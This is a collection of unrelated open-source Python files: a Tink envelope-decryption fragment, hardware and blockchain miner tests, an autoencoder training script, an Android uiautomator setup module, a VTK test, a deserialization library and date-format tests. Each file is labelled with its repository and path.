dek = tink_pb2.KeyData()
dek.type_url = self.key_template.type_url
dek.value = dek_bytes
dek.key_material_type = tink_pb2.KeyData.KeyMaterialType.SYMMETRIC
dek_aead = core.Registry.primitive(dek, aead.Aead)
# Extract ciphertext payload and decrypt
ct_bytes = ciphertext[DEK_LEN_BYTES + dek_len:]
return dek_aead.decrypt(ct_bytes, associated_data)
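# --- Illustrative sketch (editor's addition, not part of the original module) ---
# Splits a ciphertext produced by KmsEnvelopeAead.encrypt() back into its parts,
# following the layout documented in the class docstring: 4-byte big-endian DEK
# length, KMS-encrypted DEK, then the AEAD payload. The helper name is
# illustrative only.
def _split_envelope_ciphertext(ciphertext: bytes):
  if len(ciphertext) < DEK_LEN_BYTES:
    raise core.TinkError
  (dek_len,) = struct.unpack('>I', ciphertext[:DEK_LEN_BYTES])
  encrypted_dek = ciphertext[DEK_LEN_BYTES:DEK_LEN_BYTES + dek_len]
  aead_payload = ciphertext[DEK_LEN_BYTES + dek_len:]
  return dek_len, encrypted_dek, aead_payload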
LabAixBidouille/micropython | tests/pyb/can.py | 11aa6ba456287d6c80598a7ebbebd2887ce8f5a2 | from pyb import CAN
CAN.initfilterbanks(14)
can = CAN(1)
print(can)
can.init(CAN.LOOPBACK)
print(can)
print(can.any(0))
# Catch all filter
can.setfilter(0, CAN.MASK16, 0, (0, 0, 0, 0))
can.send('abcd', 123)
print(can.any(0))
print(can.recv(0))
can.send('abcd', -1)
print(can.recv(0))
can.send('abcd', 0x7FF + 1)
print(can.recv(0))
# Test too long message
try:
can.send('abcdefghi', 0x7FF)
except ValueError:
print('passed')
else:
print('failed')
del can
# Testing extended IDs
can = CAN(1, CAN.LOOPBACK, extframe = True)
# Catch all filter
can.setfilter(0, CAN.MASK32, 0, (0, 0))
print(can)
try:
can.send('abcde', 0x7FF + 1)
except ValueError:
print('failed')
else:
r = can.recv(0)
if r[0] == 0x7FF+1 and r[3] == b'abcde':
print('passed')
else:
print('failed, wrong data received')
del can
# Test RxCallbacks
can = CAN(1, CAN.LOOPBACK)
can.setfilter(0, CAN.LIST16, 0, (1, 2, 3, 4))
can.setfilter(1, CAN.LIST16, 1, (5, 6, 7, 8))
def cb0(bus, reason):
print('cb0')
if reason == 0:
print('pending')
if reason == 1:
print('full')
if reason == 2:
print('overflow')
def cb1(bus, reason):
print('cb1')
if reason == 0:
print('pending')
if reason == 1:
print('full')
if reason == 2:
print('overflow')
def cb0a(bus, reason):
print('cb0a')
if reason == 0:
print('pending')
if reason == 1:
print('full')
if reason == 2:
print('overflow')
def cb1a(bus, reason):
print('cb1a')
if reason == 0:
print('pending')
if reason == 1:
print('full')
if reason == 2:
print('overflow')
can.rxcallback(0, cb0)
can.rxcallback(1, cb1)
can.send('11111111',1)
can.send('22222222',2)
can.send('33333333',3)
can.rxcallback(0, cb0a)
can.send('44444444',4)
can.send('55555555',5)
can.send('66666666',6)
can.send('77777777',7)
can.rxcallback(1, cb1a)
can.send('88888888',8)
print(can.recv(0))
print(can.recv(0))
print(can.recv(0))
print(can.recv(1))
print(can.recv(1))
print(can.recv(1))
can.send('11111111',1)
can.send('55555555',5)
print(can.recv(0))
print(can.recv(1))
TahiG/pyquarkchain | quarkchain/cluster/tests/test_miner.py | 30da626ef6b50bd07b230aac05a3cef7fd7f23cf | import asyncio
import time
import unittest
from typing import Optional
from quarkchain.cluster.miner import DoubleSHA256, Miner, MiningWork, validate_seal
from quarkchain.config import ConsensusType
from quarkchain.core import RootBlock, RootBlockHeader
from quarkchain.p2p import ecies
from quarkchain.utils import sha3_256
class TestMiner(unittest.TestCase):
def setUp(self):
super().setUp()
def miner_gen(consensus, create_func, add_func, **kwargs):
m = Miner(
consensus, create_func, add_func, self.get_mining_params, **kwargs
)
m.enabled = True
return m
self.miner_gen = miner_gen
self.added_blocks = []
@staticmethod
def get_mining_params(rounds: Optional[int] = None):
# guarantee target time is hit
ret = {"target_block_time": 0.0, "is_test": True}
if rounds is not None:
ret["rounds"] = rounds
return ret
def test_mine_new_block_normal_case(self):
async def create(retry=True):
if len(self.added_blocks) >= 5:
return None # stop the game
return RootBlock(
RootBlockHeader(create_time=int(time.time())),
tracking_data="{}".encode("utf-8"),
)
async def add(block):
nonlocal miner
self.added_blocks.append(block)
for consensus in (
ConsensusType.POW_SIMULATE,
ConsensusType.POW_ETHASH,
ConsensusType.POW_SHA3SHA3,
):
miner = self.miner_gen(consensus, create, add)
# should generate 5 blocks and then end
loop = asyncio.get_event_loop()
loop.run_until_complete(miner._mine_new_block_async())
self.assertEqual(len(self.added_blocks), 5)
def test_simulate_mine_handle_block_exception(self):
i = 0
async def create(retry=True):
nonlocal i
if i >= 5:
return None
return RootBlock(
RootBlockHeader(create_time=int(time.time())),
tracking_data="{}".encode("utf-8"),
)
async def add(block):
nonlocal i, miner
try:
if i % 2 == 0:
raise Exception("(╯°□°)╯︵ ┻━┻")
else:
self.added_blocks.append(block)
finally:
i += 1
miner = self.miner_gen(ConsensusType.POW_SIMULATE, create, add)
# only 2 blocks can be added
loop = asyncio.get_event_loop()
loop.run_until_complete(miner._mine_new_block_async())
self.assertEqual(len(self.added_blocks), 2)
def test_sha3sha3(self):
miner = self.miner_gen(ConsensusType.POW_SHA3SHA3, None, None)
block = RootBlock(
RootBlockHeader(create_time=42, difficulty=5),
tracking_data="{}".encode("utf-8"),
)
work = MiningWork(block.header.get_hash_for_mining(), 42, 5)
# only process one block, which is passed in. `None` means termination right after
miner.input_q.put((None, {}))
miner.mine_loop(
work,
{"consensus_type": ConsensusType.POW_SHA3SHA3},
miner.input_q,
miner.output_q,
)
mined_res = miner.output_q.get()
block.header.nonce = mined_res.nonce
validate_seal(block.header, ConsensusType.POW_SHA3SHA3)
def test_qkchash(self):
miner = self.miner_gen(ConsensusType.POW_QKCHASH, None, None)
block = RootBlock(
RootBlockHeader(create_time=42, difficulty=5),
tracking_data="{}".encode("utf-8"),
)
work = MiningWork(block.header.get_hash_for_mining(), 42, 5)
# only process one block, which is passed in. `None` means termination right after
miner.input_q.put((None, {}))
miner.mine_loop(
work,
{"consensus_type": ConsensusType.POW_QKCHASH},
miner.input_q,
miner.output_q,
)
mined_res = miner.output_q.get()
block.header.nonce = mined_res.nonce
block.header.mixhash = mined_res.mixhash
validate_seal(block.header, ConsensusType.POW_QKCHASH)
def test_only_remote(self):
async def go():
miner = self.miner_gen(ConsensusType.POW_SHA3SHA3, None, None)
with self.assertRaises(ValueError):
await miner.get_work()
with self.assertRaises(ValueError):
await miner.submit_work(b"", 42, b"")
loop = asyncio.get_event_loop()
loop.run_until_complete(go())
def test_get_work(self):
now = 42
async def create(retry=True):
nonlocal now
return RootBlock(RootBlockHeader(create_time=now, extra_data=b"{}"))
miner = self.miner_gen(ConsensusType.POW_SHA3SHA3, create, None, remote=True)
async def go():
nonlocal now
# no current work, will generate a new one
work = await miner.get_work(now=now)
self.assertEqual(len(work), 3)
self.assertEqual(len(miner.work_map), 1)
h = list(miner.work_map.keys())[0]
self.assertEqual(work.hash, h)
# cache hit
now += 1
work = await miner.get_work(now=now)
self.assertEqual(work.hash, h)
self.assertEqual(len(miner.work_map), 1)
# new work if interval passed
now += 10
work = await miner.get_work(now=now)
self.assertEqual(len(miner.work_map), 2)
self.assertNotEqual(work.hash, h)
# work map cleaned up if too much time passed
now += 100
await miner.get_work(now=now)
self.assertEqual(len(miner.work_map), 1) # only new work itself
loop = asyncio.get_event_loop()
loop.run_until_complete(go())
def test_submit_work(self):
now = 42
block = RootBlock(
RootBlockHeader(create_time=42, extra_data=b"{}", difficulty=5)
)
async def create(retry=True):
return block
async def add(block_to_add):
self.added_blocks.append(block_to_add)
miner = self.miner_gen(ConsensusType.POW_SHA3SHA3, create, add, remote=True)
async def go():
work = await miner.get_work(now=now)
self.assertEqual(work.height, 0)
self.assertEqual(work.difficulty, 5)
# submitted block doesn't exist
res = await miner.submit_work(b"lolwut", 0, sha3_256(b""))
self.assertFalse(res)
solver = DoubleSHA256(work)
sol = solver.mine(100, 200).nonce
self.assertGreater(sol, 100) # ensure non-solution is tried
non_sol = sol - 1
# invalid pow proof
res = await miner.submit_work(work.hash, non_sol, sha3_256(b""))
self.assertFalse(res)
# valid submission, also check internal state afterwards
res = await miner.submit_work(work.hash, sol, sha3_256(b""))
self.assertTrue(res)
self.assertEqual(miner.work_map, {})
self.assertEqual(len(self.added_blocks), 1)
self.assertIsNone(miner.current_work)
loop = asyncio.get_event_loop()
loop.run_until_complete(go())
def test_submit_work_with_guardian(self):
now = 42
block = RootBlock(
RootBlockHeader(create_time=42, extra_data=b"{}", difficulty=1000)
)
async def create(retry=True):
return block
async def add(_):
pass
miner = self.miner_gen(
ConsensusType.POW_SHA3SHA3,
create,
add,
remote=True,
# fake pk, will succeed in test but fail in real world when
# adding the block to the root chain
guardian_private_key=ecies.generate_privkey(),
)
async def go():
for i in range(42, 100):
work = await miner.get_work(now=now)
self.assertEqual(work.height, 0)
# guardian: diff 1000 -> 1, any number should work
res = await miner.submit_work(work.hash, i, sha3_256(b""))
self.assertTrue(res)
loop = asyncio.get_event_loop()
loop.run_until_complete(go())
def test_validate_seal_with_adjusted_diff(self):
diff = 1000
block = RootBlock(
RootBlockHeader(create_time=42, difficulty=diff),
tracking_data="{}".encode("utf-8"),
)
block.header.nonce = 0
with self.assertRaises(ValueError):
validate_seal(block.header, ConsensusType.POW_SHA3SHA3)
# significantly lowering the diff should pass
validate_seal(block.header, ConsensusType.POW_SHA3SHA3, adjusted_diff=1)
nriesterer/iccm-neural-bound | analysis/networks/autoencoder/train_eval.py | e14b103ba2c81a197de5b0edf948c19d57f0d3ba | """ Evaluates the training performance of the autoencoder.
"""
import time
import pandas as pd
import numpy as np
import torch
import torch.optim as optim
import torch.nn as nn
import ccobra
import onehot
import autoencoder
# General settings
training_datafile = '../../data/Ragni-train.csv'
test_datafile = '../../data/Ragni-test.csv'
n_epochs = 150
batch_size = 16
net = autoencoder.DenoisingAutoencoder()
criterion = nn.MSELoss()
optimizer = optim.Adam(net.parameters())
def csv_to_tensor(datafile):
profiles = []
response_dicts = []
task_sequences = []
df = pd.read_csv(datafile)
for _, subj_df in df.groupby('id'):
# Obtain the task-response mapping for all syllogisms
response_dict = {}
task_sequence = []
for _, task_series in subj_df.sort_values('sequence').iterrows():
item = ccobra.Item(
task_series['id'], task_series['domain'], task_series['task'],
task_series['response_type'], task_series['choices'], task_series['sequence'])
syllogism = ccobra.syllogistic.Syllogism(item)
response_dict[syllogism.encoded_task] = syllogism.encode_response(
task_series['response'].split(';'))
task_sequence.append(syllogism.encoded_task)
# Convert the task-response mapping to the reasoner profile
profile = []
for task in ccobra.syllogistic.SYLLOGISMS:
profile.append(onehot.onehot_response(response_dict[task]))
profiles.append(profile)
response_dicts.append(response_dict)
task_sequences.append(task_sequence)
profile_tensor = torch.tensor(profiles).float().view(-1, 576)
return profile_tensor, np.array(response_dicts), np.array(task_sequences)
# Construct the training and test tensors
train_data, train_resp_dicts, train_seqs = csv_to_tensor(training_datafile)
test_data, test_resp_dicts, test_seqs = csv_to_tensor(test_datafile)
def compute_accuracy(data, resp_dicts, seqs):
accs = []
for subj_idx in range(len(data)):
subj_resp_dict = resp_dicts[subj_idx]
subj_seq = seqs[subj_idx]
profile_tensor = torch.zeros((576)).float()
subj_hits = []
for task in subj_seq:
task_idx = ccobra.syllogistic.SYLLOGISMS.index(task)
start = task_idx * 9
end = start + 9
truth = subj_resp_dict[task]
# Query the network for a prediction
prediction_idx = net(profile_tensor)[start:end].argmax()
prediction = ccobra.syllogistic.RESPONSES[prediction_idx]
subj_hits.append(prediction == truth)
# Add the true response to the profile
profile_tensor[start:end] = torch.from_numpy(onehot.onehot_response(truth))
accs.append(subj_hits)
return accs
# Training loop
train_accs = []
test_accs = []
losses = []
for epoch in range(n_epochs):
start_time = time.time()
# Permute the training data
rnd_idxs = np.random.permutation(np.arange(len(train_data)))
train_data = train_data[rnd_idxs]
train_resp_dicts = train_resp_dicts[rnd_idxs]
train_seqs = train_seqs[rnd_idxs]
batch_losses = []
for batch_idx in range(len(train_data) // batch_size):
# Obtain the batch data
start = batch_idx * batch_size
end = start + batch_size
batch_data = train_data[start:end]
input_data = batch_data
# Augment the input data by adding noise
noise = torch.bernoulli(torch.zeros_like(input_data) + 0.8)
input_data = input_data * noise
# Perform the training
outputs = net(input_data)
loss = criterion(outputs, batch_data)
optimizer.zero_grad()
loss.backward()
optimizer.step()
batch_losses.append(loss.item())
losses.append(np.mean(batch_losses))
# Compute the accuracies for evaluation
net.eval()
# Compute the overall accuracy on the training dataset
train_acc = compute_accuracy(train_data, train_resp_dicts, train_seqs)
test_acc = compute_accuracy(test_data, test_resp_dicts, test_seqs)
# Diagnostig output
print('Epoch {}/{} ({:.2f}s): {}'.format(
epoch + 1, n_epochs, time.time() - start_time, np.mean(batch_losses)))
print(' train acc: {:.4f} ({:.4f})'.format(np.mean(train_acc), np.std(train_acc)))
print(' test acc : {:.4f} ({:.4f})'.format(np.mean(test_acc), np.std(test_acc)))
# Store the accuracy results
train_accs.append(train_acc)
test_accs.append(test_acc)
# Write the accuracies to disk
print('Writing the results to disk...')
np.save('train_accs.npy', np.array(train_accs))
np.save('test_accs.npy', np.array(test_accs))
np.save('train_losses.npy', np.array(losses))
Aver58/ColaFrameWork | Tools/GAutomator/wpyscripts/uiautomator/uiautomator_manager.py | 04c6750305ad734b30eceb95b463695b8373845a | #-*- coding: UTF-8 -*-
"""
Tencent is pleased to support the open source community by making GAutomator available.
Copyright (C) 2016 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" basis, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
"""
__author__ = 'minhuaxu [email protected]'
import time
import os
import logging
from libs.uiauto.uiautomator import AutomatorDevice
from wpyscripts.common.adb_process import AdbTool
logger = logging.getLogger("wetest")
_device_port = 9008
_uiautomator_port = os.environ.get("UIAUTOMATOR_PORT", "19008")
def _init_uiautomator():
"""
        Initialize uiautomator: push the stub jar to the device, start it, and forward the local port.
:return:
"""
file_path = os.path.split(os.path.realpath(__file__))[0]
uiautomator_stub_path = os.path.abspath(
os.path.join(file_path, "..","third","libs","uiAutomator","uiautomator-stub.jar"))
adb=AdbTool()
print(adb.cmd_wait("push",uiautomator_stub_path,"/data/local/tmp"))
logger.debug("Start UIAutomator")
uiautomator_process=adb.cmd("shell","uiautomator","runtest","uiautomator-stub.jar","-c","com.github.uiautomatorstub.Stub")
time.sleep(3)
logger.debug("Exit uiautomator")
adb.forward(_uiautomator_port,_device_port)
def _init():
port = os.environ.get("UIAUTOMATORPORT")
if port:
return int(port)
else:
"""
            Local run: initialize UiAutomator here.
"""
_init_uiautomator()
return int(_uiautomator_port)
def get_uiautomator():
if get_uiautomator.instance:
return get_uiautomator.instance
else:
port=_init()
get_uiautomator.instance = AutomatorDevice(None, port, os.environ.get("PLATFORM_IP", "127.0.0.1"), None)
return get_uiautomator.instance
get_uiautomator.instance=None
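# --- Illustrative usage sketch (editor's addition, not part of the original module) ---
# Typical call pattern: fetch the lazily created AutomatorDevice and query it.
# The `.info` attribute is assumed from the bundled uiautomator stub API and is
# shown only as an example call.
def _example_get_uiautomator():
    device = get_uiautomator()  # sets up the stub and port forwarding on first use
    return device.info  # basic device/display information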
timkrentz/SunTracker | IMU/VTK-6.2.0/Filters/Core/Testing/Python/TestSynchronizedTemplates3D.py | 9a189cc38f45e5fbc4e4c700d7295a871d022795 | #!/usr/bin/env python
import vtk
from vtk.test import Testing
from vtk.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()
class TestSynchronizedTemplates3D(Testing.vtkTest):
def testAll(self):
reader = vtk.vtkImageReader()
reader.SetDataByteOrderToLittleEndian()
reader.SetDataExtent(0,63,0,63,1,93)
reader.SetDataSpacing(3.2,3.2,1.5)
reader.SetFilePrefix("" + str(VTK_DATA_ROOT) + "/Data/headsq/quarter")
reader.SetDataMask(0x7fff)
# write isosurface to file
#vtkSynchronizedTemplates3D stemp
stemp = vtk.vtkContourFilter()
stemp.SetInputConnection(reader.GetOutputPort())
stemp.SetValue(0,1150)
stemp.GenerateTrianglesOff()
stemp.Update()
self.failUnlessEqual(stemp.GetOutputDataObject(0).GetNumberOfPoints(),39315)
self.failUnlessEqual(stemp.GetOutputDataObject(0).GetNumberOfCells(),38380)
stemp.GenerateTrianglesOn()
stemp.Update()
self.failUnlessEqual(stemp.GetOutputDataObject(0).GetNumberOfPoints(),39315)
self.failUnlessEqual(stemp.GetOutputDataObject(0).GetNumberOfCells(),78268)
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(stemp.GetOutputPort())
mapper.ScalarVisibilityOff()
head = vtk.vtkActor()
head.SetMapper(mapper)
head.GetProperty().SetColor(1,0.7,0.6)
# Create the RenderWindow, Renderer and Interactor
#
ren1 = vtk.vtkRenderer()
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren1)
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
# Add the actors to the renderer, set the background and size
#
ren1.AddActor(head)
ren1.SetBackground(1,1,1)
renWin.SetSize(400,400)
ren1.SetBackground(0.5,0.5,0.6)
ren1.GetActiveCamera().SetPosition(99.8847,537.926,15)
ren1.GetActiveCamera().SetFocalPoint(99.8847,109.81,15)
ren1.GetActiveCamera().SetViewAngle(20)
ren1.GetActiveCamera().SetViewUp(0,0,-1)
ren1.ResetCameraClippingRange()
# render the image
#
renWin.Render()
# prevent the tk window from showing up then start the event loop
# --- end of script --
if __name__ == "__main__":
Testing.main([(TestSynchronizedTemplates3D, 'test')])
iAndriy/deserialize | deserialize/__init__.py | 3552517873d68d3bb953b44dd9512f0e0d045191 | """A module for deserializing data to Python objects."""
# pylint: disable=unidiomatic-typecheck
# pylint: disable=protected-access
# pylint: disable=too-many-branches
# pylint: disable=wildcard-import
import enum
import functools
import typing
from typing import Any, Callable, Dict, List, Optional, Union
from deserialize.conversions import camel_case, pascal_case
from deserialize.decorators import constructed, _call_constructed
from deserialize.decorators import default, _get_default, _has_default
from deserialize.decorators import (
downcast_field,
_get_downcast_field,
downcast_identifier,
_get_downcast_class,
allow_downcast_fallback,
_allows_downcast_fallback,
)
from deserialize.decorators import ignore, _should_ignore
from deserialize.decorators import key, _get_key
from deserialize.decorators import parser, _get_parser
from deserialize.decorators import auto_snake, _uses_auto_snake
from deserialize.decorators import allow_unhandled, _should_allow_unhandled
from deserialize.exceptions import (
DeserializeException,
InvalidBaseTypeException,
NoDefaultSpecifiedException,
UndefinedDowncastException,
UnhandledFieldException,
)
from deserialize.type_checks import *
class RawStorageMode(enum.Enum):
"""The storage mode for the raw data on each object.
If a store mode is set, the data will be stored in the attribute named:
`__deserialize_raw__`
"""
# Do not store the raw data at all
none = "none"
# Only store the data on the root node
root = "root"
# Store on all objects (WARNING: This can use a significant amount of memory)
all = "all"
def child_mode(self) -> "RawStorageMode":
"""Determine the mode for child parsing.
When we move to the next child iteration, we need to change mode
in some cases. For instance, if we only store the root node, then we
need to set all the children to not be stored.
        :raises DeserializeException: If we get an unexpected storage mode
:returns: The child raw storage mode
"""
if self == RawStorageMode.none:
return RawStorageMode.none
if self == RawStorageMode.root:
return RawStorageMode.none
if self == RawStorageMode.all:
return RawStorageMode.all
raise DeserializeException(f"Unexpected raw storage mode: {self}")
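# --- Illustrative sketch (editor's addition, not part of the original module) ---
# How child_mode() propagates: `root` stores raw data only on the top-level
# object, so children are parsed with `none`, while `all` keeps propagating.
def _raw_storage_mode_example():
    assert RawStorageMode.root.child_mode() is RawStorageMode.none
    assert RawStorageMode.all.child_mode() is RawStorageMode.all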
# pylint: disable=function-redefined
def deserialize(class_reference, data, *, throw_on_unhandled: bool = False, raw_storage_mode: RawStorageMode = RawStorageMode.none): # type: ignore
"""Deserialize data to a Python object."""
if not isinstance(data, dict) and not isinstance(data, list):
raise InvalidBaseTypeException(
"Only lists and dictionaries are supported as base raw data types"
)
if hasattr(class_reference, "__name__"):
name = class_reference.__name__
else:
name = str(class_reference)
return _deserialize(
class_reference,
data,
name,
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode,
)
# pylint: enable=function-redefined
# pylint:disable=too-many-return-statements
def _deserialize(
class_reference, data, debug_name, *, throw_on_unhandled: bool, raw_storage_mode: RawStorageMode
):
"""Deserialize data to a Python object, but allow base types"""
# In here we try and use some "heuristics" to deserialize. We have 2 main
# options to do this. For the first, we can take the expected type and try
# and deserialize the data to that and show any errors. The other option is
# to take the data, and try and determine the types and deserialize that
# way. We do a mix of both.
#
# For example, we check if we have an any type or None type first and return
# early, since we can't deserialize directly to those (since that doesn't
# make any sense). But then later, we can't go for a list directly to a
# type, so we have to go through each item in the data, and iterate.
#
# This produces quite a complex interweaving of operations. The general
# approach I've found to work is to try and do specific type checks first,
# then handle collection data, then any other types afterwards. That's not
# set in stone though.
def finalize(value: Optional[Any]) -> Optional[Any]:
"""Run through any finalization steps before returning the value."""
# Set raw data where applicable
if raw_storage_mode in [RawStorageMode.root, RawStorageMode.all]:
# We can't set attributes on primitive types
if hasattr(value, "__dict__"):
setattr(value, "__deserialize_raw__", data)
return value
if class_reference == Any:
return finalize(data)
# Check if it's None (since things like Union[int, Optional[str]] become
# Union[int, str, None] so we end up iterating against it)
if class_reference == type(None) and data is None:
return finalize(None)
if is_union(class_reference):
valid_types = union_types(class_reference, debug_name)
exceptions = []
for valid_type in valid_types:
try:
return finalize(
_deserialize(
valid_type,
data,
debug_name,
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode.child_mode(),
)
)
except DeserializeException as ex:
exceptions.append(str(ex))
exception_message = (
f"Cannot deserialize '{type(data)}' to '{class_reference}' for '{debug_name}' ->"
)
for exception in exceptions:
exception_lines = exception.split("\n")
sub_message = f"\n\t* {exception_lines[0]}"
for line in exception_lines[1:]:
sub_message += f"\n\t{line}"
exception_message += sub_message
raise DeserializeException(exception_message)
if isinstance(data, dict):
return finalize(
_deserialize_dict(
class_reference,
data,
debug_name,
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode,
)
)
if isinstance(data, list):
return finalize(
_deserialize_list(
class_reference,
data,
debug_name,
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode,
)
)
if not is_typing_type(class_reference) and issubclass(class_reference, enum.Enum):
try:
return finalize(class_reference(data))
# pylint:disable=bare-except
except:
enum_by_name = getattr(class_reference, str(data), None)
if enum_by_name:
return finalize(enum_by_name)
# pylint:enable=bare-except
# This will be handled at the end
pass
# If we still have a type from the typing module, we don't know how to
# handle it
if is_typing_type(class_reference):
# The data should not be None if we have a type that got here. Optionals
# are handled by unions above, so if we are here, it's a non-optional
# type and therefore should not be None.
if data is None:
raise DeserializeException(
f"No value for '{debug_name}'. Expected value of type '{class_reference}'"
)
raise DeserializeException(
f"Unsupported deserialization type: {class_reference} for {debug_name}"
)
# Whatever we have left now is either correct, or invalid
if isinstance(data, class_reference):
return finalize(data)
raise DeserializeException(
f"Cannot deserialize '{type(data)}' to '{class_reference}' for '{debug_name}'"
)
# pylint:enable=too-many-return-statements
def _deserialize_list(
class_reference,
list_data,
debug_name,
*,
throw_on_unhandled: bool,
raw_storage_mode: RawStorageMode,
):
if not isinstance(list_data, list):
raise DeserializeException(
f"Cannot deserialize '{type(list_data)}' as a list for {debug_name}."
)
if not is_list(class_reference):
raise DeserializeException(
f"Cannot deserialize a list to '{class_reference}' for {debug_name}"
)
list_content_type_value = list_content_type(class_reference, debug_name)
output = []
for index, item in enumerate(list_data):
deserialized = _deserialize(
list_content_type_value,
item,
f"{debug_name}[{index}]",
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode.child_mode(),
)
output.append(deserialized)
return output
def _deserialize_dict(
class_reference, data, debug_name, *, throw_on_unhandled: bool, raw_storage_mode: RawStorageMode
):
"""Deserialize a dictionary to a Python object."""
# Check if we are doing a straightforward dictionary parse first, or if it
# has to be deserialized
remaining_properties = set(data.keys())
if not isinstance(data, dict):
raise DeserializeException(
f"Data was not dict for instance: {class_reference} for {debug_name}"
)
if is_dict(class_reference):
if class_reference is dict:
# If types of dictionary entries are not defined, do not deserialize
return data
key_type, value_type = dict_content_types(class_reference, debug_name)
result = {}
for dict_key, dict_value in data.items():
if key_type != Any and not isinstance(dict_key, key_type):
raise DeserializeException(
f"Could not deserialize key {dict_key} to type {key_type} for {debug_name}"
)
result[dict_key] = _deserialize(
value_type,
dict_value,
f"{debug_name}.{dict_key}",
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode.child_mode(),
)
remaining_properties.remove(dict_key)
if throw_on_unhandled and len(remaining_properties) > 0:
raise UnhandledFieldException(
f"The following field was unhandled: {list(remaining_properties)[0]} for {debug_name}"
)
return result
    # It wasn't a straightforward dictionary, so we are in deserialize mode
class_instance = None
class_reference_downcast_field = _get_downcast_field(class_reference)
if class_reference_downcast_field:
downcast_value = data[class_reference_downcast_field]
new_reference = _get_downcast_class(class_reference, downcast_value)
if new_reference is None:
if _allows_downcast_fallback(class_reference):
return _deserialize(
Dict[Any, Any],
data,
debug_name,
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode.child_mode(),
)
raise UndefinedDowncastException(
f"Could not find subclass of {class_reference} with downcast identifier '{downcast_value}' for {debug_name}"
)
class_reference = new_reference
class_instance = class_reference.__new__(class_reference)
handled_fields = set()
hints = typing.get_type_hints(class_reference)
if len(hints) == 0:
raise DeserializeException(
f"Could not deserialize {data} into {class_reference} due to lack of type hints ({debug_name})"
)
for attribute_name, attribute_type in hints.items():
if _should_ignore(class_reference, attribute_name):
continue
property_key = _get_key(class_reference, attribute_name)
parser_function = _get_parser(class_reference, property_key)
if is_classvar(attribute_type):
if property_key in data:
raise DeserializeException(
f"ClassVars cannot be set: {debug_name}.{attribute_name}"
)
continue
if _uses_auto_snake(class_reference) and attribute_name.lower() != attribute_name:
raise DeserializeException(
f"When using auto_snake, all properties must be snake cased. Error on: {debug_name}.{attribute_name}"
)
using_default = False
if property_key in data:
value = data[property_key]
handled_fields.add(property_key)
property_value = parser_function(value)
elif _uses_auto_snake(class_reference) and camel_case(property_key) in data:
value = data[camel_case(property_key)]
handled_fields.add(camel_case(property_key))
property_value = parser_function(value)
elif _uses_auto_snake(class_reference) and pascal_case(property_key) in data:
value = data[pascal_case(property_key)]
handled_fields.add(pascal_case(property_key))
property_value = parser_function(value)
else:
if _has_default(class_reference, attribute_name):
deserialized_value = _get_default(class_reference, attribute_name)
using_default = True
else:
if not is_union(attribute_type) or type(None) not in union_types(
attribute_type, debug_name
):
raise DeserializeException(
f"Unexpected missing value for: {debug_name}.{attribute_name}"
)
property_value = parser_function(None)
if not using_default:
deserialized_value = _deserialize(
attribute_type,
property_value,
f"{debug_name}.{attribute_name}",
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode.child_mode(),
)
setattr(class_instance, attribute_name, deserialized_value)
unhandled = set(data.keys()) - handled_fields
if throw_on_unhandled and len(unhandled) > 0:
filtered_unhandled = [
key for key in unhandled if not _should_allow_unhandled(class_reference, key)
]
if len(filtered_unhandled) > 0:
raise UnhandledFieldException(
f"Unhandled field: {list(filtered_unhandled)[0]} for {debug_name}"
)
_call_constructed(class_reference, class_instance)
return class_instance
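# --- Illustrative usage sketch (editor's addition, not part of the original module) ---
# Minimal end-to-end use of the public deserialize() entry point defined above.
# The Shipment class and the sample payload are invented purely for illustration.
def _example_deserialize_usage():
    class Shipment:
        identifier: int
        description: Optional[str]
        items: List[str]
    payload = {"identifier": 12, "description": None, "items": ["bolt", "nut"]}
    shipment = deserialize(Shipment, payload, raw_storage_mode=RawStorageMode.root)
    return shipment.identifier, shipment.items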
snoopyjc/ssf | tests/test_get_set.py | b995cae0e90d38e3758d4944fb144831f9bae0a5 | from ssf import SSF
ssf = SSF(errors='raise')
def test_get_set_days():
dn = ssf.get_day_names()
assert isinstance(dn, tuple)
assert dn == (('Mon', 'Monday'),
('Tue', 'Tuesday'),
('Wed', 'Wednesday'),
('Thu', 'Thursday'),
('Fri', 'Friday'),
('Sat', 'Saturday'),
('Sun', 'Sunday'))
ssf.set_day_names([['MO', 'MON'],
('TU', 'TUE'), ['WE', 'WED'],
('TH', 'THU'), ['FR', 'FRI'],
('SA', 'SAT'), ['SU', 'SUN']])
assert ssf.format('ddd dddd', '10/3/2020') == 'SA SAT'
assert ssf.format('ddd dddd', '10/4/2020') == 'SU SUN'
assert ssf.format('ddd dddd', '10/5/2020') == 'MO MON'
assert ssf.format('ddd dddd', '10/6/2020') == 'TU TUE'
assert ssf.format('ddd dddd', '10/7/2020') == 'WE WED'
assert ssf.format('ddd dddd', '10/8/2020') == 'TH THU'
assert ssf.format('ddd dddd', '10/9/2020') == 'FR FRI'
try:
ssf.set_day_names(2)
assert False # Failed
except ValueError:
pass
try:
ssf.set_day_names((1, 2, 3, 4, 5, 6, 7))
assert False # Failed
except ValueError:
pass
def test_get_set_months():
mn = ssf.get_month_names()
assert isinstance(mn, tuple)
assert mn == (None, ('J', 'Jan', 'January'), ('F', 'Feb', 'February'), ('M', 'Mar', 'March'),
('A', 'Apr', 'April'), ('M', 'May', 'May'), ('J', 'Jun', 'June'), ('J', 'Jul', 'July'),
('A', 'Aug', 'August'), ('S', 'Sep', 'September'), ('O', 'Oct', 'October'),
('N', 'Nov', 'November'), ('D', 'Dec', 'December'))
ssf.set_month_names(mn[:-1] + (('X', 'DE', 'DEC'),) )
